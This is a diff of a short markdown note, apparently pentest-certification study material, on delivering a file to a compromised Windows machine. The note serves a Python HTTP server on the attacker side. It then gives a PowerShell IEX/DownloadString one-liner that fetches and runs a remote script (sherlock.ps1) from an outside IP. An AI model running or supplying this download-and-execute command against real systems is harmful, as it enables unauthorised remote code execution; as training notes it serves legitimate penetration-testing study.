hoangtrungkien/PNPT/Delivery/Download_Execute PS.md

 ## Get the file ready
 Put it into /root/transfer/
-start HTTP server: *python3 -m http.server 80*
+Start HTTP server: *python3 -m http.server 80*

 ## Download and run the file on windows machine
 To the user shell
+Go to a folder that we can write: *cd c:\temp*
 *echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.16.18/sherlock.ps1') | powershell -noprofile -*